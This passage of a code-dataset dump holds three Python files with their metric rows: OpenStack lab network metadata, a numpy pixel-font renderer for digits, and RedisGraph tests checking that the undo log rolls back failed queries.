| 0
| 0.146739
| 0.224719
| 712
| 23
| 54
| 30.956522
| 0.606884
| 0
| 0
| 0.684211
| 0
| 0
| 0.425562
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.473684
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c3e1c2c6c7618f8ada842bd0d09ec67ddd4226f9
| 9,294
|
py
|
Python
|
src/openstackapi/network_meta.py
|
jiangyt2112/NetworkMonitor
|
f59944add504c6a081a4434b7f027472e6679e29
|
[
"Apache-2.0"
] | null | null | null |
src/openstackapi/network_meta.py
|
jiangyt2112/NetworkMonitor
|
f59944add504c6a081a4434b7f027472e6679e29
|
[
"Apache-2.0"
] | null | null | null |
src/openstackapi/network_meta.py
|
jiangyt2112/NetworkMonitor
|
f59944add504c6a081a4434b7f027472e6679e29
|
[
"Apache-2.0"
] | null | null | null |
{'networks':
[
{u'provider:physical_network': None,
u'port_security_enabled': True,
u'provider:network_type': u'vxlan',
u'id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'router:external': False,
u'availability_zone_hints': [],
u'availability_zones': [u'nova'],
u'ipv4_address_scope': None,
u'shared': False,
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'subnets': [u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b'],
u'description': u'',
u'tags': [],
u'updated_at': u'2018-10-26T09:33:23Z',
u'provider:segmentation_id': 73,
u'name': u'int-net',
u'admin_state_up': True,
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:33:23Z',
u'mtu': 1450
},
{u'provider:physical_network': u'extnet',
u'ipv6_address_scope': None,
u'revision_number': 4,
u'port_security_enabled': True,
u'provider:network_type': u'flat',
u'id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'router:external': True,
u'availability_zone_hints': [],
u'availability_zones': [u'nova'],
u'ipv4_address_scope': None,
u'shared': True,
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'subnets': [u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a'],
u'description': u'',
u'tags': [],
u'updated_at': u'2018-10-26T09:35:20Z',
u'is_default': False,
u'provider:segmentation_id': None,
u'name': u'ext-net',
u'admin_state_up': True,
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:19Z',
u'mtu': 1500}
]
}
{'subnets':
[
{u'host_routes': [],
u'service_types': [],
u'description': u'',
u'enable_dhcp': True,
u'tags': [],
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:33:23Z',
u'dns_nameservers': [],
u'updated_at': u'2018-10-26T09:33:23Z',
u'ipv6_ra_mode': None,
u'allocation_pools': [{u'start': u'192.168.1.2', u'end': u'192.168.1.254'}],
u'gateway_ip': u'192.168.1.1',
u'revision_number': 0,
u'ip_version': 4,
u'ipv6_address_mode': None,
u'cidr': u'192.168.1.0/24',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b',
u'subnetpool_id': None,
u'name': u'int-sub'
},
{u'host_routes': [],
u'service_types': [],
u'description': u'',
u'enable_dhcp': False,
u'tags': [],
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:20Z',
u'dns_nameservers': [],
u'updated_at': u'2018-10-26T09:35:20Z',
u'ipv6_ra_mode': None,
u'allocation_pools': [{u'start': u'192.168.166.20', u'end': u'192.168.166.40'}],
u'gateway_ip': u'192.168.166.1',
u'revision_number': 0,
u'ip_version': 4,
u'ipv6_address_mode': None,
u'cidr': u'192.168.166.0/24',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a',
u'subnetpool_id': None,
u'name': u'ext-sub'}
]
}
{'ports':
[
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:33:27Z',
u'device_owner': u'network:dhcp',
u'revision_number': 5,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [
{u'subnet_id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b',
u'ip_address': u'192.168.1.2'
}
],
u'id': u'3e25711d-884a-413a-a9e3-06b4f9225117',
u'security_groups': [],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:d0:20:d1',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'dhcp280b4426-d1ca-5484-9f17-9aa7c0b012c5-956df7c4-25d9-4564-8b81-843462ae707a',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:33:24Z',
u'binding:vnic_type': u'normal'
},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:36:45Z',
u'device_owner': u'compute:nova',
u'revision_number': 6,
u'port_security_enabled': True,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b', u'ip_address': u'192.168.1.8'}],
u'id': u'3ef787ad-6748-4b58-87a1-6af1441cc947',
u'security_groups': [u'a0e3eb1d-413a-4c5d-95dd-752ebd7991c5'],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:5d:9e:22',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'61205745-b2bf-4db0-ad50-e7a60bf08bd5',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:36:41Z',
u'binding:vnic_type': u'normal'
},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:36:01Z',
u'device_owner': u'network:router_interface',
u'revision_number': 7,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b', u'ip_address': u'192.168.1.1'}],
u'id': u'661bb3c3-3651-40e7-9728-19c2565e2149',
u'security_groups': [],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:84:7c:ec',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'd4edac45-231a-4b5e-9e95-c629d5c7fc62',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:56Z',
u'binding:vnic_type': u'normal'
},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T10:01:30Z',
u'device_owner': u'network:floatingip',
u'revision_number': 4,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a', u'ip_address': u'192.168.166.23'}],
u'id': u'ad4dcecc-2d8b-4021-b2f0-46cacf6917f8',
u'security_groups': [],
u'binding:vif_details': {},
u'binding:vif_type': u'unbound',
u'mac_address': u'fa:16:3e:c0:6c:33',
u'project_id': u'',
u'status': u'N/A',
u'binding:host_id': u'',
u'description': u'',
u'tags': [],
u'device_id': u'ff32223d-db9f-4b41-b647-5daf9aa69f82',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'tenant_id': u'',
u'created_at': u'2018-10-26T10:01:30Z',
u'binding:vnic_type': u'normal'},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:35:43Z',
u'device_owner': u'network:router_gateway',
u'revision_number': 6,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a', u'ip_address': u'192.168.166.28'}],
u'id': u'b8cfeaad-eff1-4687-8109-3120102323c8',
u'security_groups': [],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:4d:46:a6',
u'project_id': u'',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'd4edac45-231a-4b5e-9e95-c629d5c7fc62',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'tenant_id': u'',
u'created_at': u'2018-10-26T09:35:38Z',
u'binding:vnic_type': u'normal'
}
]
}
{'routers':
[
{
u'status': u'ACTIVE',
u'external_gateway_info':
{
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'enable_snat': True,
u'external_fixed_ips':
[
{
u'subnet_id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a',
u'ip_address': u'192.168.166.28'
}
]
},
u'availability_zone_hints': [],
u'availability_zones': [u'nova'],
u'description': u'',
u'tags': [],
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:38Z',
u'admin_state_up': True,
u'distributed': False,
u'updated_at': u'2018-10-26T09:35:56Z',
u'ha': False,
u'flavor_id': None,
u'revision_number': 4,
u'routes': [],
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'id': u'd4edac45-231a-4b5e-9e95-c629d5c7fc62',
u'name': u'R'
}
]
}
| 33.919708
| 110
| 0.646546
| 1,426
| 9,294
| 4.04979
| 0.165498
| 0.028052
| 0.024242
| 0.031169
| 0.855065
| 0.836883
| 0.795152
| 0.768139
| 0.705974
| 0.701126
| 0
| 0.195794
| 0.155907
| 9,294
| 274
| 111
| 33.919708
| 0.540344
| 0
| 0
| 0.553903
| 0
| 0
| 0.615062
| 0.240237
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7f17b49a3427776c186fc1ddfd58e65fa50dd5ae
| 6,932
|
py
|
Python
|
dnd_gui/util/text.py
|
JStuckner/DnD-GUI-2
|
bf393c94e48df2e17113046b7f917ac2176ac8e8
|
[
"MIT"
] | null | null | null |
dnd_gui/util/text.py
|
JStuckner/DnD-GUI-2
|
bf393c94e48df2e17113046b7f917ac2176ac8e8
|
[
"MIT"
] | null | null | null |
dnd_gui/util/text.py
|
JStuckner/DnD-GUI-2
|
bf393c94e48df2e17113046b7f917ac2176ac8e8
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
def string_to_array(string, height=30, color=255):
array = np.zeros((height, 1))
size = int(round(height/10))
for i in range(len(string)):
nex = char_to_array(string[i],color)
nex = np.repeat(np.repeat(nex, size, axis=0), size, axis=1)
array = np.append(array, nex, axis=1)
return np.uint8(array)
def char_to_array(char, x=255):
if char == 'template':
return np.array([[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0]])
if char == ' ':
return np.array([[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0]])
if char == '0':
return np.array([[0,0,0,x,x,0,0,0],
[0,0,x,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,x,0,0,x,0,0],
[0,0,0,x,x,0,0,0]])
if char == '1':
return np.array([[0,0,0,x,0,0,0],
[0,0,x,x,0,0,0],
[0,x,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,x,x,x,x,x,0]])
if char == '2':
return np.array([[0,0,0,x,x,0,0,0],
[0,0,x,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,x,0,0],
[0,0,0,0,x,0,0,0],
[0,0,0,x,0,0,0,0],
[0,0,x,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,x,x,x,x,x,0]])
if char == '3':
return np.array([[0,0,0,x,x,0,0,0],
[0,0,x,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,x,x,x,0,0],
[0,0,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,x,0,0,0,x,0],
[0,0,0,x,x,x,0,0]])
if char == '4':
return np.array([[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,x,x,x,x,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0]])
if char == '5':
return np.array([[0,x,x,x,x,x,x,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,x,x,0,0,0],
[0,x,x,0,0,x,0,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,x,0,0,0,x,0,0],
[0,0,x,x,x,0,0,0]])
if char == '6':
return np.array([[0,0,0,0,0,x,x,0],
[0,0,0,0,x,0,0,0],
[0,0,0,x,0,0,0,0],
[0,0,x,0,0,0,0,0],
[0,0,x,x,x,0,0,0],
[0,x,0,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,x,0,0,x,0,0],
[0,0,0,x,x,0,0,0]])
if char == '7':
return np.array([[0,x,x,x,x,x,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,x,0,0],
[0,0,0,0,x,0,0,0],
[0,0,0,x,0,0,0,0],
[0,0,x,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0]])
if char == '8':
return np.array([[0,0,x,x,x,0,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,0,x,x,x,0,0],
[0,0,x,x,x,0,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,0,x,x,x,0,0]])
if char == '9':
return np.array([[0,0,x,x,x,0,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,0,x,x,x,x,0],
[0,0,0,0,0,x,0],
[0,0,0,0,0,x,0],
[0,0,0,0,x,0,0],
[0,0,0,x,0,0,0],
[0,x,x,0,0,0,0]])
if char == 'n':
return np.array([[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,x,0,x,x,0,0],
[0,x,x,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0]])
if char == 'm':
return np.array([[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,x,0,x,x,0,x,x,x,0,0],
[0,x,x,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0]])
| 39.386364
| 67
| 0.241344
| 1,264
| 6,932
| 1.318829
| 0.037184
| 0.841032
| 0.959208
| 0.974205
| 0.821836
| 0.814037
| 0.810438
| 0.791842
| 0.771446
| 0.767846
| 0
| 0.279163
| 0.531304
| 6,932
| 175
| 68
| 39.611429
| 0.233918
| 0
| 0
| 0.648485
| 0
| 0
| 0.00303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012121
| false
| 0
| 0.012121
| 0
| 0.115152
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
7f187748d6821bde22d58e571f5e7d816927d12d
| 13,974
|
py
|
Python
|
tests/flow/test_undo_log.py
|
RedisLabsModules/redis-graph
|
2a56e350043ab6f08f7dfbf075e8fd3ced29cae9
|
[
"ISC",
"Apache-2.0",
"MIT",
"Ruby",
"BSD-3-Clause"
] | 313
|
2017-06-06T19:22:15.000Z
|
2018-11-02T09:42:37.000Z
|
tests/flow/test_undo_log.py
|
RedisLabsModules/redis-graph
|
2a56e350043ab6f08f7dfbf075e8fd3ced29cae9
|
[
"ISC",
"Apache-2.0",
"MIT",
"Ruby",
"BSD-3-Clause"
] | 107
|
2018-03-20T07:59:03.000Z
|
2018-11-01T22:04:39.000Z
|
tests/flow/test_undo_log.py
|
RedisLabsModules/redis-graph
|
2a56e350043ab6f08f7dfbf075e8fd3ced29cae9
|
[
"ISC",
"Apache-2.0",
"MIT",
"Ruby",
"BSD-3-Clause"
] | 30
|
2017-07-14T22:04:24.000Z
|
2018-10-28T03:17:50.000Z
|
from common import *
GRAPH_ID = "undo-log"
class testUndoLog():
def __init__(self):
self.env = Env(decodeResponses=True)
self.redis_con = self.env.getConnection()
self.graph = Graph(self.redis_con, GRAPH_ID)
def tearDown(self):
self.redis_con.flushall()
def test01_undo_create_node(self):
try:
self.graph.query("CREATE (n:N) WITH n RETURN 1 * 'a'")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# node (n:N) should be removed, expecting an empty graph
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 0)
def test02_undo_create_edge(self):
self.graph.query("CREATE (:N {v: 1}), (:N {v: 2})")
try:
self.graph.query("""MATCH (s:N {v: 1}), (t:N {v: 2})
CREATE (s)-[r:R]->(t)
WITH r
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# edge [r:R] should have been removed
result = self.graph.query("MATCH ()-[r:R]->() RETURN r")
self.env.assertEquals(len(result.result_set), 0)
def test03_undo_delete_node(self):
self.graph.query("CREATE (:N)")
try:
self.graph.query("""MATCH (n:N)
DELETE n
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted node should be revived, expecting a single node
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 1)
def test04_undo_delete_edge(self):
self.graph.query("CREATE (:N)-[:R]->(:N)")
try:
self.graph.query("""MATCH ()-[r:R]->()
DELETE r
WITH r
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted edge should be revived, expecting a single edge
result = self.graph.query("MATCH ()-[r:R]->() RETURN r")
self.env.assertEquals(len(result.result_set), 1)
def test05_undo_update_node(self):
self.graph.query("CREATE (:N {a: 1, b:'str', c:[1, 'str', point({latitude:1, longitude:2})], d:point({latitude:1, longitude:2})})")
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n.a = 2, n.b = '', n.c = null, n.d = point({latitude:2, longitude:1})
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH (n:N) RETURN n.a, n.b, n.c, n.d")
self.env.assertEquals(result.result_set[0][0], 1)
self.env.assertEquals(result.result_set[0][1], 'str')
self.env.assertEquals(result.result_set[0][2], [1, 'str', {'latitude':1, 'longitude':2}])
self.env.assertEquals(result.result_set[0][3], {'latitude':1, 'longitude':2})
# introduce a new attribute `n.e`
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n.e = 1
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be deleted
result = self.graph.query("MATCH (n:N) RETURN n.e")
self.env.assertEquals(result.result_set[0][0], None)
# introduce a new Label `n:M`
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n:M
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the additional label 'M' to be removed
result = self.graph.query("MATCH (n:M) RETURN COUNT(n)")
self.env.assertEquals(result.result_set[0][0], 0)
# clear all attributes of `n`
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n = {}
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH (n:N) RETURN n.a, n.b, n.c, n.d")
self.env.assertEquals(result.result_set[0][0], 1)
self.env.assertEquals(result.result_set[0][1], 'str')
self.env.assertEquals(result.result_set[0][2], [1, 'str', {'latitude':1, 'longitude':2}])
self.env.assertEquals(result.result_set[0][3], {'latitude':1, 'longitude':2})
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n += {e: 1}
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH (n:N) RETURN n.a, n.b, n.c, n.d, n.e")
self.env.assertEquals(result.result_set[0][0], 1)
self.env.assertEquals(result.result_set[0][1], 'str')
self.env.assertEquals(result.result_set[0][2], [1, 'str', {'latitude':1, 'longitude':2}])
self.env.assertEquals(result.result_set[0][3], {'latitude':1, 'longitude':2})
self.env.assertEquals(result.result_set[0][4], None)
def test06_undo_update_edge(self):
self.graph.query("CREATE (:N)-[:R {v: 1}]->(:N)")
try:
self.graph.query("""MATCH ()-[r]->()
SET r.v = 2
WITH r
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH ()-[r]->() RETURN r.v")
self.env.assertEquals(result.result_set[0][0], 1)
def test07_undo_create_indexed_node(self):
self.graph.query("CREATE INDEX FOR (n:N) ON (n.v)")
try:
self.graph.query("CREATE (n:N {v:1}) WITH n RETURN 1 * 'a'")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# node (n:N) should be removed, expecting an empty graph
result = self.graph.query("MATCH (n:N {v:1}) RETURN n")
self.env.assertEquals(len(result.result_set), 0)
def test08_undo_create_indexed_edge(self):
self.graph.query("CREATE INDEX FOR ()-[r:R]->() ON (r.v)")
self.graph.query("CREATE (:N {v: 1}), (:N {v: 2})")
try:
self.graph.query("""MATCH (s:N {v: 1}), (t:N {v: 2})
CREATE (s)-[r:R {v:1}]->(t)
WITH r
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# edge [r:R] should have been removed
result = self.graph.query("MATCH ()-[r:R {v:1}]->() RETURN r")
self.env.assertEquals(len(result.result_set), 0)
def test09_undo_delete_indexed_node(self):
self.graph.query("CREATE INDEX FOR (n:N) ON (n.v)")
self.graph.query("CREATE (:N {v: 0})")
try:
self.graph.query("""MATCH (n:N)
DELETE n
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted node should be revived, expecting a single node
query = "MATCH (n:N {v: 0}) RETURN n"
plan = self.graph.execution_plan(query)
self.env.assertContains("Node By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(len(result.result_set), 1)
def test10_undo_delete_indexed_edge(self):
self.graph.query("CREATE INDEX FOR ()-[r:R]->() ON (r.v)")
self.graph.query("CREATE (:N)-[:R {v: 0}]->(:N)")
try:
self.graph.query("""MATCH ()-[r:R]->()
DELETE r
WITH r
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted edge should be revived, expecting a single edge
query = "MATCH ()-[r:R {v: 0}]->() RETURN r"
plan = self.graph.execution_plan(query)
self.env.assertContains("Edge By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(len(result.result_set), 1)
def test11_undo_update_indexed_node(self):
self.graph.query("CREATE INDEX FOR (n:N) ON (n.v)")
self.graph.query("CREATE (:N {v: 1})")
try:
self.graph.query("""MATCH (n:N {v: 1})
SET n.v = 2
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored and indexed
query = "MATCH (n:N {v: 1}) RETURN n.v"
plan = self.graph.execution_plan(query)
self.env.assertContains("Node By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(result.result_set[0][0], 1)
def test12_undo_update_indexed_edge(self):
self.graph.query("CREATE INDEX FOR ()-[r:R]->() ON (r.v)")
self.graph.query("CREATE (:N)-[:R {v: 1}]->(:N)")
try:
self.graph.query("""MATCH ()-[r]->()
SET r.v = 2
WITH r
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored and indexed
query = "MATCH ()-[r:R {v: 1}]->() RETURN r.v"
plan = self.graph.execution_plan(query)
self.env.assertContains("Edge By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(result.result_set[0][0], 1)
def test13_undo_implicit_edge_delete(self):
self.graph.query("CREATE (n:N), (m:N), (n)-[:R]->(m), (n)-[:R]->(m)")
try:
self.graph.query("""MATCH (n:N)
DETACH DELETE n
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted node should be revived, expecting a single node
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 2)
result = self.graph.query("MATCH ()-[r:R]->() RETURN r")
self.env.assertEquals(len(result.result_set), 2)
def test14_undo_timeout(self):
# Change timeout value from default
response = self.redis_con.execute_command("GRAPH.CONFIG SET TIMEOUT 1")
self.env.assertEqual(response, "OK")
try:
self.graph.query("UNWIND range(1, 1000000) AS x CREATE (n:N)")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except Exception as e:
pass
# node (n:N) should be removed, expecting an empty graph
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 0)
# Restore timeout value to default
response = self.redis_con.execute_command("GRAPH.CONFIG SET TIMEOUT 0")
self.env.assertEqual(response, "OK")
def test15_complex_undo(self):
# create a graph
self.graph.query("UNWIND range(1, 3) AS x CREATE (:N {v:x})-[:R{v:x}]->(:N {v:x})")
try:
self.graph.query("MATCH (n:N)-[r:R]->(m:N) SET n.v = n.v + 1, r.v = r.v + 1, m.v = m.v + 1 CREATE (:N{v:n.v}) DELETE r RETURN CASE n.v WHEN 3 THEN n.v * 'a' ELSE n.v END")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except Exception as e:
self.env.assertEquals(str(e), "Type mismatch: expected Integer but was String")
# validate no changed is the created graph
expected_result = [[1, 1, 1], [2, 2, 2], [3, 3, 3]]
result = self.graph.query("MATCH (n:N)-[r:R]->(m:N) RETURN n.v, r.v, m.v")
self.env.assertEquals(result.result_set, expected_result)
| 41.221239
| 183
| 0.515171
| 1,825
| 13,974
| 3.890411
| 0.083836
| 0.078592
| 0.112394
| 0.085634
| 0.861268
| 0.845634
| 0.829859
| 0.807042
| 0.785352
| 0.779577
| 0
| 0.020053
| 0.350508
| 13,974
| 338
| 184
| 41.343195
| 0.76223
| 0.156505
| 0
| 0.738956
| 0
| 0.036145
